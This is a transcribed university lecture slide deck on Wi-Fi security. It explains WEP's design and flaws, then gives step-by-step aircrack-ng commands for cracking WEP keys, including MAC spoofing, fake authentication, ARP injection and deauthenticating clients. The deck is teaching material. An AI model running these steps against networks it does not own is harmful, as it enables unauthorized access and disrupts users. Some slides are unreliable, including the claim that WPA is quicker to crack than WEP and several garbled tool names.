1 / 44

Security in Wireless Local Area Networks

Security in Wireless Local Area Networks. CENG410. Definitions. WiFi : IEEE 802.11 standard for Wireless Local Area Networks WEP: Wired Equivalent Privacy WPA: Wi-Fi Protected Access Ethernet: IEEE 802.3 standard for Wired Local Area Networks WLAN: Wireless Local Area Network. WEP.

gaura
Télécharger la présentation

Security in Wireless Local Area Networks

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Security in Wireless Local Area Networks CENG410

  2. Definitions • WiFi: IEEE 802.11 standard for Wireless Local Area Networks • WEP: Wired Equivalent Privacy • WPA: Wi-Fi Protected Access • Ethernet: IEEE802.3 standard for Wired Local Area Networks • WLAN: Wireless Local Area Network

  3. WEP • It is the original IEEE 802.11 security architecture and protocol • It is responsible for providing authentication, confidentiality and data integrity • Design Philosophy: • 802.11 was designed as a “wireless Ethernet.” • provide the same degree of security as is in traditional wired (Ethernet) networks

  4. WEP: Failure in Design • Ethernet (the IEEE802.3 standard) implements no security mechanism in hardware or software • Wired Ethernet networks are inherently “secured” since the access to the medium (wires) which carry the data can be restricted or secured • In wireless networks, there is no provision to prevent access to the media (Aether)

  5. Key Establishment in 802.11 • 802.11 relies on “preshared” keys between the mobile nodes or stations (STA) and the Access Points (APs) in a Basic Service Set (BSS). • BSS is a term used to define a term used to describe a collection of station communicating using 802.11 • Key establishment is outside the scope of WEP • By not specifying a key establishment protocol, it seems that the 802.11 designers were side-stepping the issue.

  6. BSS

  7. Key Management in 802.11 • the absence of any key management protocol led to multiple problems: • Deployment requires manual configuration of keys into all STAs and the AP . Manual intervention meant that this approach was open to manual error. • Most chosen key were weak or at most not strong

  8. Key Management in 802.11 • There is no way for each STA to be assigned a unique key. The same key is shared by even more STAs. • Besides being a security loophole to authentication, this higher exposure makes the key more susceptible to compromise

  9. Authentication in 802.11 • Authentication is used to control access to the network • Connection (Association) to WLAN • the station must find out which networks it currently has access to • the network must authenticate the station • the station must authenticate the network

  10. Authentication in 802.11 • Access points (APs) periodically broadcast beacons • Beacons are management frames which announce the existence of a network

  11. Authentication in 802.11 • Beacons are used by the APs to allow stations to find and identify a network • Each beacon contains a Service Set Identifier (SSID), also called the network name, which uniquely identifies an ESS (extended Service Set) • When an STA wants to access a network, it has two options: passive scan and active scan • Active scanning Client broadcast a probe request and waits to hear response • Passive scanning : Client waits for probes sent by the AP

  12. Authentication in 802.11 • Two forms of authentication: Open System Authentication (OSA) and Shared Key Authentication (SKA) • Authentication scheme must be agreed upon by both the STA and the network • STA proposes the scheme and the network either accepts or rejects

  13. Open System Authentication • This is the default authentication algorithm • Any station which wants to join a network sends authentication request containing the algorithm type (0 for OSA) • The AP replies back with an authentication response No Authentication Check is Done

  14. Shared Key Authentication • SKA is based on the challenge-response system • SKA divides stations into two groups: • stations that are allowed access • all other stations

  15. Challenge/Response • The challenge text is a 128-byte number generated by the pseudorandom-number-generator (also used in WEP) using the presharedsecret key and a random Initialization Vector (IV) • A key along with an IV can be thought of as a large key where the first 24-bits of it ( i.e. the IV) is dynamically changing, thus making it harder for the hacker to BRUTE FORCE the key. • When the station receives this random number (the challenge), it encrypts the random number using WEP and its own IV to generate a response

  16. Challenge/Response • the IV that the station uses for encrypting the challenge response is different from (and independent of) the IV that the AP used for generating the random number • On receiving the response, the AP decrypts the response using the preshared keys and the IV that it receives as part of the response • If matched with original challenge, station is authenticated

  17. Pseudo-Authentication Schemes • Stations which know the network’s SSID to join the network. This form of authentication poses minimal challenge since the SSID of the network is often transmitted in cleartext • MAC Filtering: The AP maintains a list of MAC addresses of all the STAs that are allowed to connect to the network. Any serious eavesdropper or hacker can find out the MAC address of a legitimate client and use it.

  18. Confidentiality in 802.11 WEP uses a preestablished/preshared set of keys

  19. WEP Process • Calculate the Integrity Check Value (ICV) over the length of the MAC Protocol Data Unit (MPDU) and append this 4-byte value to the end of the MPDU • Which contains the Random number generated • Select a master key to be used from one of the four possible preshared secret keys • Preexisting manually placed • Select an IV and concatenate it with the master key to obtain a key seed • This Key seed will enter RC4 to generate a key stream • A Key stream can be thought of as a long pseudo-random generated one time pad key that is XORED with the plaintext in the case the random number concatenated with ICV

  20. WEP Process • The key seed is then fed to an RC4 key-generator. The RC4 key stream is then XORed with the MPDU ICV to generate the ciphertext • A 4-byte header is then appended to the encrypted packet: • 3-byte IV value • 1-byte key-id specifying which one of the four preshared secret keys is being used as the master key

  21. WEP Packet

  22. What’s Wrong with WEP? • WEP uses RC4 (a stream cipher) in synchronous mode for encrypting data packets • The problem is that a stream cipher is not suitable for a wireless medium where packet loss is widespread • This is one of the most fundamental problems of WEP

  23. What’s Wrong with WEP? • Since the synchronization between the end-points is not perfect (and subject to packet loss), 802.11 changes keys for every packet • Thus if we could force the STA to resend the encrypted key frequently, due to packet loss, we could have redundancy that can be exploited . • To create a per-packet key, the IV is simply concatenated with the master key • The more exposure a key gets, the more it is susceptible to be compromised

  24. What’s Wrong with WEP? • The IV which is concatenated with the master key to create the per-packet key is transmitted in cleartext with the packet too • This makes WEP susceptible to an Fluhrer-Mantin-Shamir (FMS) attack that exploit RC4 weak keys • The FMS attack relies on the ability of the attacker to collect multiple 802.11 packets which have been encrypted with weak keys

  25. Loopholes in 802.11 Security • Does not provide any mechanism for key establishment over an unsecure medium. • Uses a synchronous stream cipher over a medium, where it is difficult to ensure synchronization during a complete session. • Use a per-packet key by concatenating the IV directly to the preshared key to produce a key for RC4. This exposes the base key or master key to attacks like FMS.

  26. Loopholes in 802.11 Security • IV used is just 24 bits long, this results in a very limited key-space. • This means that we could have an (IV master key pair) very frequently • Key reuse highly probable. • CRC-32 used for message integrity is linear. • The linear properties of CRC codes allow an attacker even to keep the CRC unchanged while modifying parts of the message. • This also means that the CRC can be reversible • ICV does not protect the integrity of the 802.11 header, thus opening the door to redirection attacks. • Header is not encrypted, we can get the MAC of a client • No protection against replay attacks. • That is regeneration of old messages to fool the AP • There is no support for a STA to authenticate the network • The authentication is done by making sure that the STA is legitimate. But what if I place a malicious access point and I performed a dummy authentication to that STA. I could gain access to that STA information • Thus the authentication should go both ways

  27. Cracking WEP • Tools used: Aircrack-ng Suite • Allow intruders or ethical hackers to gain access to IV records to decipher the master key • airmon-ng: allows the user to put the wireless card (on the station used for the attack) in monitor mode • airodump-ng: allows the user to sniff and save packets of choice (e.g. IV packets)

  28. Cracking WEP • aireplay-ng: allows the user to replay a packet (i.e. send packets forged from collected legitimate packets) • aircrack-ng: allows the user to crack the RS4 encrypted key

  29. BackTrack • A preconfigured live Linux distribution that contain tools for security assessment • It can be installed locally on your hard drives • Aircrack-ng suite is one of the preloaded tools • It might not contain the appropriate drivers for your wireless network card • A VMware image is available as well: suitable for use with USB wireless adapters

  30. Engineer’s Ethical Responsibility Before Proceeding, Remember that it is unethical, illegal and 7aram to use other people’s internet access.

  31. WEP Cracking Process 1. Put wireless interface in monitor mode airmon-ng start wifi0(or wlan0). From that point onward, monitor identifier (e.g. ath0, mon0, etc…) will be used

  32. WEP Cracking Process 2. Find wireless network (BSSID, ESSID, channel) airodump-ng ath1 (ath1: monitor identifier, CH: channel, clients addresses in last 2 lines)

  33. WEP Cracking Process Note: To filter packets from a specific AP and of specific type (IV in this case) and save them in a file (for later key cracking task) use: airodump-ng –b <BSSID> -c <channel> --ivs –w filename <monitor_id>

  34. WEP Cracking Process 3. Find a valid/connected (associated) client (MAC address is found in the screen of airodump)

  35. WEP Cracking Process 4. Wait until client is gone and change mac address to valid client MAC (invoke commands in order) airmon-ng stop wifi1 ifconfig wifi1 down macchanger –m XX:XX:XX:XX:XX:XX wifi1 ifconfig wifi1 up airmon-ng start wifi1

  36. WEP Cracking Process 5. Associate with AP and inject ARP packets (run each of the three commands in a separate shell window) airodump-ng -c <channel> --ivs -w <filename> ath1 aireplay-ng --fakeauth 0 –a <BSSID> -h <local MAC> -e ESSID ath1 aireplay-ng -3 -b <BSSID> ath1

  37. WEP Cracking Process 6. If no ARP is found and injected (0 ARP in previous screen) in a reasonable amount of time, try to deauthenticate an existing client (so ARP packets are generated) aireplay-ng --deauth 0 -a BSSID -c CLientMAC ath1

  38. WEP Cracking Process 7. Stop airodump (ctrl-c) and use the saved IV’s file to crack the key airocrack-ng -0 -b BSSID <filename>

  39. WPA • WPA is the replacement security protocol for WiFi. • WPA is quicker to crack than the weaker form of wireless encryption – WEP (!!!). • WPA strength lies in the strength of the key used (so use a strong key)

  40. How Does WPA Fix WEP Loopholes?

  41. How Does WPA Fix WEP Loopholes?

  42. References • http://www.corelan.be:8800/index.php/2009/02/20/cheatsheet-cracking-wep-with-backtrack-4-and-aircrack-ng/ • http://www.maxi-pedia.com/crack+WEP • http://www.isaac.cs.berkeley.edu/isaac/mobicom.pdf • http://www.cs.ucl.ac.uk/staff/M.Handley/papers/fragmentation.pdf

More Related